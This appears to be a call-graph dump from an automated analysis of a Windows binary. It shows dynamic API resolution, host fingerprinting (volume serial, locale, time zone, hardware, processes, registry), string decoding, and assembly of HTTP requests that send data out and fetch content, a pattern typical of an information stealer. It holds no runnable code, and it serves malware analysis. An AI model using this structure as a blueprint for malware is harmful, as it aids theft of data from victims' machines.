a8a036 8 API calls 14522->14524 14523->14524 14525 a8a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14524->14525 14526 a8a146 14524->14526 14525->14526 14527 a8a153 8 API calls 14526->14527 14528 a8a216 14526->14528 14527->14528 14529 a8a298 14528->14529 14530 a8a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14528->14530 14531 a8a2a5 6 API calls 14529->14531 14532 a8a337 14529->14532 14530->14529 14531->14532 14533 a8a41f 14532->14533 14534 a8a344 9 API calls 14532->14534 14535 a8a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14533->14535 14536 a8a4a2 14533->14536 14534->14533 14535->14536 14537 a8a4ab GetProcAddress GetProcAddress 14536->14537 14538 a8a4dc 14536->14538 14537->14538 14539 a8a515 14538->14539 14540 a8a4e5 GetProcAddress GetProcAddress 14538->14540 14541 a8a612 14539->14541 14542 a8a522 10 API calls 14539->14542 14540->14539 14543 a8a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14541->14543 14544 a8a67d 14541->14544 14542->14541 14543->14544 14545 a8a69e 14544->14545 14546 a8a686 GetProcAddress 14544->14546 14547 a85ca3 14545->14547 14548 a8a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14545->14548 14546->14545 14549 a71590 14547->14549 14548->14547 15671 a71670 14549->15671 14552 a8a7a0 lstrcpy 14553 a715b5 14552->14553 14554 a8a7a0 lstrcpy 14553->14554 14555 a715c7 14554->14555 14556 a8a7a0 lstrcpy 14555->14556 14557 a715d9 14556->14557 14558 a8a7a0 lstrcpy 14557->14558 14559 a71663 14558->14559 14560 a85510 14559->14560 14561 a85521 14560->14561 14562 a8a820 2 API calls 14561->14562 14563 a8552e 14562->14563 14564 a8a820 2 API calls 14563->14564 14565 a8553b 14564->14565 14566 a8a820 2 API calls 14565->14566 14567 a85548 14566->14567 14568 a8a740 lstrcpy 14567->14568 14569 a85555 14568->14569 14570 a8a740 lstrcpy 14569->14570 14571 a85562 14570->14571 14572 a8a740 lstrcpy 14571->14572 14573 a8556f 14572->14573 14574 a8a740 lstrcpy 14573->14574 14607 a8557c 14574->14607 14575 a852c0 25 API calls 14575->14607 14576 a851f0 20 API calls 14576->14607 14577 a85643 StrCmpCA 14577->14607 14578 a856a0 StrCmpCA 14579 a857dc 14578->14579 14578->14607 14580 a8a8a0 lstrcpy 14579->14580 14581 a857e8 14580->14581 14582 a8a820 2 API calls 14581->14582 14585 a857f6 14582->14585 14583 a8a740 lstrcpy 14583->14607 14584 a8a820 lstrlen lstrcpy 14584->14607 14587 a8a820 2 API calls 14585->14587 14586 a85856 StrCmpCA 14588 a85991 14586->14588 14586->14607 14590 a85805 14587->14590 14589 a8a8a0 lstrcpy 14588->14589 14591 a8599d 14589->14591 14592 a71670 lstrcpy 14590->14592 14593 a8a820 2 API calls 14591->14593 14602 a85811 14592->14602 14594 a859ab 14593->14594 14596 a8a820 2 API calls 14594->14596 14595 a85a0b StrCmpCA 14597 a85a28 14595->14597 14598 a85a16 Sleep 14595->14598 14600 a859ba 14596->14600 14601 a8a8a0 lstrcpy 14597->14601 14598->14607 14599 a8a7a0 lstrcpy 14599->14607 14603 a71670 lstrcpy 14600->14603 14604 a85a34 14601->14604 14602->13667 14603->14602 14606 a8a820 2 API calls 14604->14606 14605 a71590 lstrcpy 14605->14607 14608 a85a43 14606->14608 14607->14575 14607->14576 14607->14577 14607->14578 14607->14583 14607->14584 14607->14586 14607->14595 14607->14599 14607->14605 14611 a8578a StrCmpCA 14607->14611 14613 a8593f StrCmpCA 14607->14613 14614 a8a8a0 lstrcpy 14607->14614 14609 a8a820 2 API calls 14608->14609 14610 a85a52 14609->14610 14612 a71670 lstrcpy 14610->14612 14611->14607 14612->14602 14613->14607 14614->14607 14616 a8754c 14615->14616 14617 a87553 GetVolumeInformationA 14615->14617 14616->14617 14618 a87591 14617->14618 14619 a875fc GetProcessHeap RtlAllocateHeap 14618->14619 14620 a87628 wsprintfA 14619->14620 14621 a87619 14619->14621 14622 a8a740 lstrcpy 14620->14622 14623 a8a740 lstrcpy 14621->14623 14624 a85da7 14622->14624 14623->14624 14624->13688 14626 a8a7a0 lstrcpy 14625->14626 14627 a74899 14626->14627 15680 a747b0 14627->15680 14629 a748a5 14630 a8a740 lstrcpy 14629->14630 14631 a748d7 14630->14631 14632 a8a740 lstrcpy 14631->14632 14633 a748e4 14632->14633 14634 a8a740 lstrcpy 14633->14634 14635 a748f1 14634->14635 14636 a8a740 lstrcpy 14635->14636 14637 a748fe 14636->14637 14638 a8a740 lstrcpy 14637->14638 14639 a7490b InternetOpenA StrCmpCA 14638->14639 14640 a74944 14639->14640 14641 a74955 14640->14641 14642 a74ecb InternetCloseHandle 14640->14642 15691 a88b60 14641->15691 14644 a74ee8 14642->14644 15686 a79ac0 CryptStringToBinaryA 14644->15686 14645 a74963 15699 a8a920 14645->15699 14648 a74976 14650 a8a8a0 lstrcpy 14648->14650 14656 a7497f 14650->14656 14651 a8a820 2 API calls 14652 a74f05 14651->14652 14653 a8a9b0 4 API calls 14652->14653 14655 a74f1b 14653->14655 14654 a74f27 codecvt 14658 a8a7a0 lstrcpy 14654->14658 14657 a8a8a0 lstrcpy 14655->14657 14659 a8a9b0 4 API calls 14656->14659 14657->14654 14670 a74f57 14658->14670 14660 a749a9 14659->14660 14661 a8a8a0 lstrcpy 14660->14661 14662 a749b2 14661->14662 14663 a8a9b0 4 API calls 14662->14663 14664 a749d1 14663->14664 14665 a8a8a0 lstrcpy 14664->14665 14666 a749da 14665->14666 14667 a8a920 3 API calls 14666->14667 14668 a749f8 14667->14668 14669 a8a8a0 lstrcpy 14668->14669 14671 a74a01 14669->14671 14670->13691 14672 a8a9b0 4 API calls 14671->14672 14673 a74a20 14672->14673 14674 a8a8a0 lstrcpy 14673->14674 14675 a74a29 14674->14675 14676 a8a9b0 4 API calls 14675->14676 14677 a74a48 14676->14677 14678 a8a8a0 lstrcpy 14677->14678 14679 a74a51 14678->14679 14680 a8a9b0 4 API calls 14679->14680 14681 a74a7d 14680->14681 14682 a8a920 3 API calls 14681->14682 14683 a74a84 14682->14683 14684 a8a8a0 lstrcpy 14683->14684 14685 a74a8d 14684->14685 14686 a74aa3 InternetConnectA 14685->14686 14686->14642 14687 a74ad3 HttpOpenRequestA 14686->14687 14689 a74ebe InternetCloseHandle 14687->14689 14690 a74b28 14687->14690 14689->14642 14691 a8a9b0 4 API calls 14690->14691 14692 a74b3c 14691->14692 14693 a8a8a0 lstrcpy 14692->14693 14694 a74b45 14693->14694 14695 a8a920 3 API calls 14694->14695 14696 a74b63 14695->14696 14697 a8a8a0 lstrcpy 14696->14697 14698 a74b6c 14697->14698 14699 a8a9b0 4 API calls 14698->14699 14700 a74b8b 14699->14700 14701 a8a8a0 lstrcpy 14700->14701 14702 a74b94 14701->14702 14703 a8a9b0 4 API calls 14702->14703 14704 a74bb5 14703->14704 14705 a8a8a0 lstrcpy 14704->14705 14706 a74bbe 14705->14706 14707 a8a9b0 4 API calls 14706->14707 14708 a74bde 14707->14708 14709 a8a8a0 lstrcpy 14708->14709 14710 a74be7 14709->14710 14711 a8a9b0 4 API calls 14710->14711 14712 a74c06 14711->14712 14713 a8a8a0 lstrcpy 14712->14713 14714 a74c0f 14713->14714 14715 a8a920 3 API calls 14714->14715 14716 a74c2d 14715->14716 14717 a8a8a0 lstrcpy 14716->14717 14718 a74c36 14717->14718 14719 a8a9b0 4 API calls 14718->14719 14720 a74c55 14719->14720 14721 a8a8a0 lstrcpy 14720->14721 14722 a74c5e 14721->14722 14723 a8a9b0 4 API calls 14722->14723 14724 a74c7d 14723->14724 14725 a8a8a0 lstrcpy 14724->14725 14726 a74c86 14725->14726 14727 a8a920 3 API calls 14726->14727 14728 a74ca4 14727->14728 14729 a8a8a0 lstrcpy 14728->14729 14730 a74cad 14729->14730 14731 a8a9b0 4 API calls 14730->14731 14732 a74ccc 14731->14732 14733 a8a8a0 lstrcpy 14732->14733 14734 a74cd5 14733->14734 14735 a8a9b0 4 API calls 14734->14735 14736 a74cf6 14735->14736 14737 a8a8a0 lstrcpy 14736->14737 14738 a74cff 14737->14738 14739 a8a9b0 4 API calls 14738->14739 14740 a74d1f 14739->14740 14741 a8a8a0 lstrcpy 14740->14741 14742 a74d28 14741->14742 14743 a8a9b0 4 API calls 14742->14743 14744 a74d47 14743->14744 14745 a8a8a0 lstrcpy 14744->14745 14746 a74d50 14745->14746 14747 a8a920 3 API calls 14746->14747 14748 a74d6e 14747->14748 14749 a8a8a0 lstrcpy 14748->14749 14750 a74d77 14749->14750 14751 a8a740 lstrcpy 14750->14751 14752 a74d92 14751->14752 14753 a8a920 3 API calls 14752->14753 14754 a74db3 14753->14754 14755 a8a920 3 API calls 14754->14755 14756 a74dba 14755->14756 14757 a8a8a0 lstrcpy 14756->14757 14758 a74dc6 14757->14758 14759 a74de7 lstrlen 14758->14759 14760 a74dfa 14759->14760 14761 a74e03 lstrlen 14760->14761 15705 a8aad0 14761->15705 14763 a74e13 HttpSendRequestA 14764 a74e32 InternetReadFile 14763->14764 14765 a74e67 InternetCloseHandle 14764->14765 14770 a74e5e 14764->14770 14767 a8a800 14765->14767 14767->14689 14768 a8a9b0 4 API calls 14768->14770 14769 a8a8a0 lstrcpy 14769->14770 14770->14764 14770->14765 14770->14768 14770->14769 15707 a8aad0 14771->15707 14773 a817c4 StrCmpCA 14774 a817cf ExitProcess 14773->14774 14776 a817d7 14773->14776 14775 a819c2 14775->13693 14776->14775 14777 a818ad StrCmpCA 14776->14777 14778 a818cf StrCmpCA 14776->14778 14779 a8185d StrCmpCA 14776->14779 14780 a8187f StrCmpCA 14776->14780 14781 a81970 StrCmpCA 14776->14781 14782 a818f1 StrCmpCA 14776->14782 14783 a81951 StrCmpCA 14776->14783 14784 a81932 StrCmpCA 14776->14784 14785 a81913 StrCmpCA 14776->14785 14786 a8a820 lstrlen lstrcpy 14776->14786 14777->14776 14778->14776 14779->14776 14780->14776 14781->14776 14782->14776 14783->14776 14784->14776 14785->14776 14786->14776 14788 a8a7a0 lstrcpy 14787->14788 14789 a75979 14788->14789 14790 a747b0 2 API calls 14789->14790 14791 a75985 14790->14791 14792 a8a740 lstrcpy 14791->14792 14793 a759ba 14792->14793 14794 a8a740 lstrcpy 14793->14794 14795 a759c7 14794->14795 14796 a8a740 lstrcpy 14795->14796 14797 a759d4 14796->14797 14798 a8a740 lstrcpy 14797->14798 14799 a759e1 14798->14799 14800 a8a740 lstrcpy 14799->14800 14801 a759ee InternetOpenA StrCmpCA 14800->14801 14802 a75a1d 14801->14802 14803 a75fc3 InternetCloseHandle 14802->14803 14805 a88b60 3 API calls 14802->14805 14804 a75fe0 14803->14804 14807 a79ac0 4 API calls 14804->14807 14806 a75a3c 14805->14806 14808 a8a920 3 API calls 14806->14808 14809 a75fe6 14807->14809 14810 a75a4f 14808->14810 14812 a8a820 2 API calls 14809->14812 14815 a7601f codecvt 14809->14815 14811 a8a8a0 lstrcpy 14810->14811 14816 a75a58 14811->14816 14813 a75ffd 14812->14813 14814 a8a9b0 4 API calls 14813->14814 14817 a76013 14814->14817 14818 a8a7a0 lstrcpy 14815->14818 14820 a8a9b0 4 API calls 14816->14820 14819 a8a8a0 lstrcpy 14817->14819 14829 a7604f 14818->14829 14819->14815 14821 a75a82 14820->14821 14822 a8a8a0 lstrcpy 14821->14822 14823 a75a8b 14822->14823 14824 a8a9b0 4 API calls 14823->14824 14825 a75aaa 14824->14825 14826 a8a8a0 lstrcpy 14825->14826 14827 a75ab3 14826->14827 14828 a8a920 3 API calls 14827->14828 14830 a75ad1 14828->14830 14829->13699 14831 a8a8a0 lstrcpy 14830->14831 14832 a75ada 14831->14832 14833 a8a9b0 4 API calls 14832->14833 14834 a75af9 14833->14834 14835 a8a8a0 lstrcpy 14834->14835 14836 a75b02 14835->14836 14837 a8a9b0 4 API calls 14836->14837 14838 a75b21 14837->14838 14839 a8a8a0 lstrcpy 14838->14839 14840 a75b2a 14839->14840 14841 a8a9b0 4 API calls 14840->14841 14842 a75b56 14841->14842 14843 a8a920 3 API calls 14842->14843 14844 a75b5d 14843->14844 14845 a8a8a0 lstrcpy 14844->14845 14846 a75b66 14845->14846 14847 a75b7c InternetConnectA 14846->14847 14847->14803 14848 a75bac HttpOpenRequestA 14847->14848 14850 a75fb6 InternetCloseHandle 14848->14850 14851 a75c0b 14848->14851 14850->14803 14852 a8a9b0 4 API calls 14851->14852 14853 a75c1f 14852->14853 14854 a8a8a0 lstrcpy 14853->14854 14855 a75c28 14854->14855 14856 a8a920 3 API calls 14855->14856 14857 a75c46 14856->14857 14858 a8a8a0 lstrcpy 14857->14858 14859 a75c4f 14858->14859 14860 a8a9b0 4 API calls 14859->14860 14861 a75c6e 14860->14861 14862 a8a8a0 lstrcpy 14861->14862 14863 a75c77 14862->14863 14864 a8a9b0 4 API calls 14863->14864 14865 a75c98 14864->14865 14866 a8a8a0 lstrcpy 14865->14866 14867 a75ca1 14866->14867 14868 a8a9b0 4 API calls 14867->14868 14869 a75cc1 14868->14869 14870 a8a8a0 lstrcpy 14869->14870 14871 a75cca 14870->14871 14872 a8a9b0 4 API calls 14871->14872 14873 a75ce9 14872->14873 14874 a8a8a0 lstrcpy 14873->14874 14875 a75cf2 14874->14875 14876 a8a920 3 API calls 14875->14876 14877 a75d10 14876->14877 14878 a8a8a0 lstrcpy 14877->14878 14879 a75d19 14878->14879 14880 a8a9b0 4 API calls 14879->14880 14881 a75d38 14880->14881 14882 a8a8a0 lstrcpy 14881->14882 14883 a75d41 14882->14883 14884 a8a9b0 4 API calls 14883->14884 14885 a75d60 14884->14885 14886 a8a8a0 lstrcpy 14885->14886 14887 a75d69 14886->14887 14888 a8a920 3 API calls 14887->14888 14889 a75d87 14888->14889 14890 a8a8a0 lstrcpy 14889->14890 14891 a75d90 14890->14891 14892 a8a9b0 4 API calls 14891->14892 14893 a75daf 14892->14893 14894 a8a8a0 lstrcpy 14893->14894 14895 a75db8 14894->14895 14896 a8a9b0 4 API calls 14895->14896 14897 a75dd9 14896->14897 14898 a8a8a0 lstrcpy 14897->14898 14899 a75de2 14898->14899 14900 a8a9b0 4 API calls 14899->14900 14901 a75e02 14900->14901 14902 a8a8a0 lstrcpy 14901->14902 14903 a75e0b 14902->14903 14904 a8a9b0 4 API calls 14903->14904 14905 a75e2a 14904->14905 14906 a8a8a0 lstrcpy 14905->14906 14907 a75e33 14906->14907 14908 a8a920 3 API calls 14907->14908 14909 a75e54 14908->14909 14910 a8a8a0 lstrcpy 14909->14910 14911 a75e5d 14910->14911 14912 a75e70 lstrlen 14911->14912 15708 a8aad0 14912->15708 14914 a75e81 lstrlen GetProcessHeap RtlAllocateHeap 15709 a8aad0 14914->15709 14916 a75eae lstrlen 14917 a75ebe 14916->14917 14918 a75ed7 lstrlen 14917->14918 14919 a75ee7 14918->14919 14920 a75ef0 lstrlen 14919->14920 14921 a75f03 14920->14921 14922 a75f1a lstrlen 14921->14922 15710 a8aad0 14922->15710 14924 a75f2a HttpSendRequestA 14925 a75f35 InternetReadFile 14924->14925 14926 a75f6a InternetCloseHandle 14925->14926 14930 a75f61 14925->14930 14926->14850 14928 a8a9b0 4 API calls 14928->14930 14929 a8a8a0 lstrcpy 14929->14930 14930->14925 14930->14926 14930->14928 14930->14929 14933 a81077 14931->14933 14932 a81151 14932->13701 14933->14932 14934 a8a820 lstrlen lstrcpy 14933->14934 14934->14933 14940 a80db7 14935->14940 14936 a80f17 14936->13709 14937 a80ea4 StrCmpCA 14937->14940 14938 a80e27 StrCmpCA 14938->14940 14939 a80e67 StrCmpCA 14939->14940 14940->14936 14940->14937 14940->14938 14940->14939 14941 a8a820 lstrlen lstrcpy 14940->14941 14941->14940 14945 a80f67 14942->14945 14943 a81044 14943->13717 14944 a80fb2 StrCmpCA 14944->14945 14945->14943 14945->14944 14946 a8a820 lstrlen lstrcpy 14945->14946 14946->14945 14948 a8a740 lstrcpy 14947->14948 14949 a81a26 14948->14949 14950 a8a9b0 4 API calls 14949->14950 14951 a81a37 14950->14951 14952 a8a8a0 lstrcpy 14951->14952 14953 a81a40 14952->14953 14954 a8a9b0 4 API calls 14953->14954 14955 a81a5b 14954->14955 14956 a8a8a0 lstrcpy 14955->14956 14957 a81a64 14956->14957 14958 a8a9b0 4 API calls 14957->14958 14959 a81a7d 14958->14959 14960 a8a8a0 lstrcpy 14959->14960 14961 a81a86 14960->14961 14962 a8a9b0 4 API calls 14961->14962 14963 a81aa1 14962->14963 14964 a8a8a0 lstrcpy 14963->14964 14965 a81aaa 14964->14965 14966 a8a9b0 4 API calls 14965->14966 14967 a81ac3 14966->14967 14968 a8a8a0 lstrcpy 14967->14968 14969 a81acc 14968->14969 14970 a8a9b0 4 API calls 14969->14970 14971 a81ae7 14970->14971 14972 a8a8a0 lstrcpy 14971->14972 14973 a81af0 14972->14973 14974 a8a9b0 4 API calls 14973->14974 14975 a81b09 14974->14975 14976 a8a8a0 lstrcpy 14975->14976 14977 a81b12 14976->14977 14978 a8a9b0 4 API calls 14977->14978 14979 a81b2d 14978->14979 14980 a8a8a0 lstrcpy 14979->14980 14981 a81b36 14980->14981 14982 a8a9b0 4 API calls 14981->14982 14983 a81b4f 14982->14983 14984 a8a8a0 lstrcpy 14983->14984 14985 a81b58 14984->14985 14986 a8a9b0 4 API calls 14985->14986 14987 a81b76 14986->14987 14988 a8a8a0 lstrcpy 14987->14988 14989 a81b7f 14988->14989 14990 a87500 6 API calls 14989->14990 14991 a81b96 14990->14991 14992 a8a920 3 API calls 14991->14992 14993 a81ba9 14992->14993 14994 a8a8a0 lstrcpy 14993->14994 14995 a81bb2 14994->14995 14996 a8a9b0 4 API calls 14995->14996 14997 a81bdc 14996->14997 14998 a8a8a0 lstrcpy 14997->14998 14999 a81be5 14998->14999 15000 a8a9b0 4 API calls 14999->15000 15001 a81c05 15000->15001 15002 a8a8a0 lstrcpy 15001->15002 15003 a81c0e 15002->15003 15711 a87690 GetProcessHeap RtlAllocateHeap 15003->15711 15006 a8a9b0 4 API calls 15007 a81c2e 15006->15007 15008 a8a8a0 lstrcpy 15007->15008 15009 a81c37 15008->15009 15010 a8a9b0 4 API calls 15009->15010 15011 a81c56 15010->15011 15012 a8a8a0 lstrcpy 15011->15012 15013 a81c5f 15012->15013 15014 a8a9b0 4 API calls 15013->15014 15015 a81c80 15014->15015 15016 a8a8a0 lstrcpy 15015->15016 15017 a81c89 15016->15017 15718 a877c0 GetCurrentProcess IsWow64Process 15017->15718 15020 a8a9b0 4 API calls 15021 a81ca9 15020->15021 15022 a8a8a0 lstrcpy 15021->15022 15023 a81cb2 15022->15023 15024 a8a9b0 4 API calls 15023->15024 15025 a81cd1 15024->15025 15026 a8a8a0 lstrcpy 15025->15026 15027 a81cda 15026->15027 15028 a8a9b0 4 API calls 15027->15028 15029 a81cfb 15028->15029 15030 a8a8a0 lstrcpy 15029->15030 15031 a81d04 15030->15031 15032 a87850 3 API calls 15031->15032 15033 a81d14 15032->15033 15034 a8a9b0 4 API calls 15033->15034 15035 a81d24 15034->15035 15036 a8a8a0 lstrcpy 15035->15036 15037 a81d2d 15036->15037 15038 a8a9b0 4 API calls 15037->15038 15039 a81d4c 15038->15039 15040 a8a8a0 lstrcpy 15039->15040 15041 a81d55 15040->15041 15042 a8a9b0 4 API calls 15041->15042 15043 a81d75 15042->15043 15044 a8a8a0 lstrcpy 15043->15044 15045 a81d7e 15044->15045 15046 a878e0 3 API calls 15045->15046 15047 a81d8e 15046->15047 15048 a8a9b0 4 API calls 15047->15048 15049 a81d9e 15048->15049 15050 a8a8a0 lstrcpy 15049->15050 15051 a81da7 15050->15051 15052 a8a9b0 4 API calls 15051->15052 15053 a81dc6 15052->15053 15054 a8a8a0 lstrcpy 15053->15054 15055 a81dcf 15054->15055 15056 a8a9b0 4 API calls 15055->15056 15057 a81df0 15056->15057 15058 a8a8a0 lstrcpy 15057->15058 15059 a81df9 15058->15059 15720 a87980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15059->15720 15062 a8a9b0 4 API calls 15063 a81e19 15062->15063 15064 a8a8a0 lstrcpy 15063->15064 15065 a81e22 15064->15065 15066 a8a9b0 4 API calls 15065->15066 15067 a81e41 15066->15067 15068 a8a8a0 lstrcpy 15067->15068 15069 a81e4a 15068->15069 15070 a8a9b0 4 API calls 15069->15070 15071 a81e6b 15070->15071 15072 a8a8a0 lstrcpy 15071->15072 15073 a81e74 15072->15073 15722 a87a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15073->15722 15076 a8a9b0 4 API calls 15077 a81e94 15076->15077 15078 a8a8a0 lstrcpy 15077->15078 15079 a81e9d 15078->15079 15080 a8a9b0 4 API calls 15079->15080 15081 a81ebc 15080->15081 15082 a8a8a0 lstrcpy 15081->15082 15083 a81ec5 15082->15083 15084 a8a9b0 4 API calls 15083->15084 15085 a81ee5 15084->15085 15086 a8a8a0 lstrcpy 15085->15086 15087 a81eee 15086->15087 15725 a87b00 GetUserDefaultLocaleName 15087->15725 15090 a8a9b0 4 API calls 15091 a81f0e 15090->15091 15092 a8a8a0 lstrcpy 15091->15092 15093 a81f17 15092->15093 15094 a8a9b0 4 API calls 15093->15094 15095 a81f36 15094->15095 15096 a8a8a0 lstrcpy 15095->15096 15097 a81f3f 15096->15097 15098 a8a9b0 4 API calls 15097->15098 15099 a81f60 15098->15099 15100 a8a8a0 lstrcpy 15099->15100 15101 a81f69 15100->15101 15729 a87b90 15101->15729 15103 a81f80 15104 a8a920 3 API calls 15103->15104 15105 a81f93 15104->15105 15106 a8a8a0 lstrcpy 15105->15106 15107 a81f9c 15106->15107 15108 a8a9b0 4 API calls 15107->15108 15109 a81fc6 15108->15109 15110 a8a8a0 lstrcpy 15109->15110 15111 a81fcf 15110->15111 15112 a8a9b0 4 API calls 15111->15112 15113 a81fef 15112->15113 15114 a8a8a0 lstrcpy 15113->15114 15115 a81ff8 15114->15115 15741 a87d80 GetSystemPowerStatus 15115->15741 15118 a8a9b0 4 API calls 15119 a82018 15118->15119 15120 a8a8a0 lstrcpy 15119->15120 15121 a82021 15120->15121 15122 a8a9b0 4 API calls 15121->15122 15123 a82040 15122->15123 15124 a8a8a0 lstrcpy 15123->15124 15125 a82049 15124->15125 15126 a8a9b0 4 API calls 15125->15126 15127 a8206a 15126->15127 15128 a8a8a0 lstrcpy 15127->15128 15129 a82073 15128->15129 15130 a8207e GetCurrentProcessId 15129->15130 15743 a89470 OpenProcess 15130->15743 15133 a8a920 3 API calls 15134 a820a4 15133->15134 15135 a8a8a0 lstrcpy 15134->15135 15136 a820ad 15135->15136 15137 a8a9b0 4 API calls 15136->15137 15138 a820d7 15137->15138 15139 a8a8a0 lstrcpy 15138->15139 15140 a820e0 15139->15140 15141 a8a9b0 4 API calls 15140->15141 15142 a82100 15141->15142 15143 a8a8a0 lstrcpy 15142->15143 15144 a82109 15143->15144 15748 a87e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15144->15748 15147 a8a9b0 4 API calls 15148 a82129 15147->15148 15149 a8a8a0 lstrcpy 15148->15149 15150 a82132 15149->15150 15151 a8a9b0 4 API calls 15150->15151 15152 a82151 15151->15152 15153 a8a8a0 lstrcpy 15152->15153 15154 a8215a 15153->15154 15155 a8a9b0 4 API calls 15154->15155 15156 a8217b 15155->15156 15157 a8a8a0 lstrcpy 15156->15157 15158 a82184 15157->15158 15752 a87f60 15158->15752 15161 a8a9b0 4 API calls 15162 a821a4 15161->15162 15163 a8a8a0 lstrcpy 15162->15163 15164 a821ad 15163->15164 15165 a8a9b0 4 API calls 15164->15165 15166 a821cc 15165->15166 15167 a8a8a0 lstrcpy 15166->15167 15168 a821d5 15167->15168 15169 a8a9b0 4 API calls 15168->15169 15170 a821f6 15169->15170 15171 a8a8a0 lstrcpy 15170->15171 15172 a821ff 15171->15172 15765 a87ed0 GetSystemInfo wsprintfA 15172->15765 15175 a8a9b0 4 API calls 15176 a8221f 15175->15176 15177 a8a8a0 lstrcpy 15176->15177 15178 a82228 15177->15178 15179 a8a9b0 4 API calls 15178->15179 15180 a82247 15179->15180 15181 a8a8a0 lstrcpy 15180->15181 15182 a82250 15181->15182 15183 a8a9b0 4 API calls 15182->15183 15184 a82270 15183->15184 15185 a8a8a0 lstrcpy 15184->15185 15186 a82279 15185->15186 15767 a88100 GetProcessHeap RtlAllocateHeap 15186->15767 15189 a8a9b0 4 API calls 15190 a82299 15189->15190 15191 a8a8a0 lstrcpy 15190->15191 15192 a822a2 15191->15192 15193 a8a9b0 4 API calls 15192->15193 15194 a822c1 15193->15194 15195 a8a8a0 lstrcpy 15194->15195 15196 a822ca 15195->15196 15197 a8a9b0 4 API calls 15196->15197 15198 a822eb 15197->15198 15199 a8a8a0 lstrcpy 15198->15199 15200 a822f4 15199->15200 15773 a887c0 15200->15773 15203 a8a920 3 API calls 15204 a8231e 15203->15204 15205 a8a8a0 lstrcpy 15204->15205 15206 a82327 15205->15206 15207 a8a9b0 4 API calls 15206->15207 15208 a82351 15207->15208 15209 a8a8a0 lstrcpy 15208->15209 15210 a8235a 15209->15210 15211 a8a9b0 4 API calls 15210->15211 15212 a8237a 15211->15212 15213 a8a8a0 lstrcpy 15212->15213 15214 a82383 15213->15214 15215 a8a9b0 4 API calls 15214->15215 15216 a823a2 15215->15216 15217 a8a8a0 lstrcpy 15216->15217 15218 a823ab 15217->15218 15778 a881f0 15218->15778 15220 a823c2 15221 a8a920 3 API calls 15220->15221 15222 a823d5 15221->15222 15223 a8a8a0 lstrcpy 15222->15223 15224 a823de 15223->15224 15225 a8a9b0 4 API calls 15224->15225 15226 a8240a 15225->15226 15227 a8a8a0 lstrcpy 15226->15227 15228 a82413 15227->15228 15229 a8a9b0 4 API calls 15228->15229 15230 a82432 15229->15230 15231 a8a8a0 lstrcpy 15230->15231 15232 a8243b 15231->15232 15233 a8a9b0 4 API calls 15232->15233 15234 a8245c 15233->15234 15235 a8a8a0 lstrcpy 15234->15235 15236 a82465 15235->15236 15237 a8a9b0 4 API calls 15236->15237 15238 a82484 15237->15238 15239 a8a8a0 lstrcpy 15238->15239 15240 a8248d 15239->15240 15241 a8a9b0 4 API calls 15240->15241 15242 a824ae 15241->15242 15243 a8a8a0 lstrcpy 15242->15243 15244 a824b7 15243->15244 15786 a88320 15244->15786 15246 a824d3 15247 a8a920 3 API calls 15246->15247 15248 a824e6 15247->15248 15249 a8a8a0 lstrcpy 15248->15249 15250 a824ef 15249->15250 15251 a8a9b0 4 API calls 15250->15251 15252 a82519 15251->15252 15253 a8a8a0 lstrcpy 15252->15253 15254 a82522 15253->15254 15255 a8a9b0 4 API calls 15254->15255 15256 a82543 15255->15256 15257 a8a8a0 lstrcpy 15256->15257 15258 a8254c 15257->15258 15259 a88320 17 API calls 15258->15259 15260 a82568 15259->15260 15261 a8a920 3 API calls 15260->15261 15262 a8257b 15261->15262 15263 a8a8a0 lstrcpy 15262->15263 15264 a82584 15263->15264 15265 a8a9b0 4 API calls 15264->15265 15266 a825ae 15265->15266 15267 a8a8a0 lstrcpy 15266->15267 15268 a825b7 15267->15268 15269 a8a9b0 4 API calls 15268->15269 15270 a825d6 15269->15270 15271 a8a8a0 lstrcpy 15270->15271 15272 a825df 15271->15272 15273 a8a9b0 4 API calls 15272->15273 15274 a82600 15273->15274 15275 a8a8a0 lstrcpy 15274->15275 15276 a82609 15275->15276 15822 a88680 15276->15822 15278 a82620 15279 a8a920 3 API calls 15278->15279 15280 a82633 15279->15280 15281 a8a8a0 lstrcpy 15280->15281 15282 a8263c 15281->15282 15283 a8265a lstrlen 15282->15283 15284 a8266a 15283->15284 15285 a8a740 lstrcpy 15284->15285 15286 a8267c 15285->15286 15287 a71590 lstrcpy 15286->15287 15288 a8268d 15287->15288 15832 a85190 15288->15832 15290 a82699 15290->13721 16020 a8aad0 15291->16020 15293 a75009 InternetOpenUrlA 15294 a75021 15293->15294 15295 a750a0 InternetCloseHandle InternetCloseHandle 15294->15295 15296 a7502a InternetReadFile 15294->15296 15297 a750ec 15295->15297 15296->15294 15297->13725 16021 a798d0 15298->16021 15300 a80759 15301 a80a38 15300->15301 15302 a8077d 15300->15302 15303 a71590 lstrcpy 15301->15303 15305 a80799 StrCmpCA 15302->15305 15304 a80a49 15303->15304 16197 a80250 15304->16197 15307 a807a8 15305->15307 15333 a80843 15305->15333 15309 a8a7a0 lstrcpy 15307->15309 15310 a807c3 15309->15310 15312 a71590 lstrcpy 15310->15312 15311 a80865 StrCmpCA 15313 a80874 15311->15313 15350 a8096b 15311->15350 15314 a8080c 15312->15314 15315 a8a740 lstrcpy 15313->15315 15316 a8a7a0 lstrcpy 15314->15316 15318 a80881 15315->15318 15319 a80823 15316->15319 15317 a8099c StrCmpCA 15320 a809ab 15317->15320 15339 a80a2d 15317->15339 15321 a8a9b0 4 API calls 15318->15321 15323 a8a7a0 lstrcpy 15319->15323 15324 a71590 lstrcpy 15320->15324 15322 a808ac 15321->15322 15325 a8a920 3 API calls 15322->15325 15326 a8083e 15323->15326 15327 a809f4 15324->15327 15329 a808b3 15325->15329 16024 a7fb00 15326->16024 15328 a8a7a0 lstrcpy 15327->15328 15331 a80a0d 15328->15331 15332 a8a9b0 4 API calls 15329->15332 15334 a8a7a0 lstrcpy 15331->15334 15335 a808ba 15332->15335 15333->15311 15336 a80a28 15334->15336 15337 a8a8a0 lstrcpy 15335->15337 15339->13729 15350->15317 15672 a8a7a0 lstrcpy 15671->15672 15673 a71683 15672->15673 15674 a8a7a0 lstrcpy 15673->15674 15675 a71695 15674->15675 15676 a8a7a0 lstrcpy 15675->15676 15677 a716a7 15676->15677 15678 a8a7a0 